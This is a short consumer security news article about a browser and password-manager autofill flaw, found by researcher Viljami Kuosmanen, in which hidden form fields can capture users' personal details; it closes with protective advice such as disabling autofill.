People are increasingly making use of the autofill facility to make easier the process of moving between multiple websites and using multiple usernames and passwords. Users are relying on autofill and password managers to make life easier – and while this is a method of staying safe online, a new flaw in certain well known browsers and password managers may leave people at risk from scammers.
The flaw has a direct effect on the functionality of autofill – used to paste saved personal information to avoid having type it afresh on every occasion. The autofill capability works on browsers such as Google Chrome and Apple Safari. Plugins add-ons that are affected include the LastPass password manager utilised on these browers.
After a user begins the process of putting their details into a website autofill gets triggered and recommends what each of the remaining boxes should contain. If users agree by clicking on one of the recommendations the function goes ahead and fills out remaining boxes.
Security researcher Viljami Kuosmanen has become aware of instances where autofill inserts information into hidden text boxes, which enables scammers to extract it without the knowledge of the user. These hidden boxes could extract details such as name, personal information that identifies a user, email address, postal address and phone number.
The situation may also have consequences for credit card details although it remains common practice for users to be given a warning before giving out those details.
To give an indication of how a scam could occur Kuosmanen developed a website that requests users’ name and email address, but with hidden boxes that get ‘autofilled’ with details such as organisation, address and phone number.
The attack is said to work only in certain circumstances where users select one of the autofill recommendations. This means that the best way to protect yourself, is to not click on one of the recommendations that pop up in a field, until a fix has been released. It is also possible to disable the autofill function in your security settings. This can be done in Chrome by clicking the deselect button with the wording “Enable Autofill to fill out web forms in a single click”. This can be found by going to deselect in settings > Advanced.
The flaw does not cause problems with Mozilla’s Firefox browser because in this instance each field is autofilled one at a time.
Photo credit: Christiaan Colen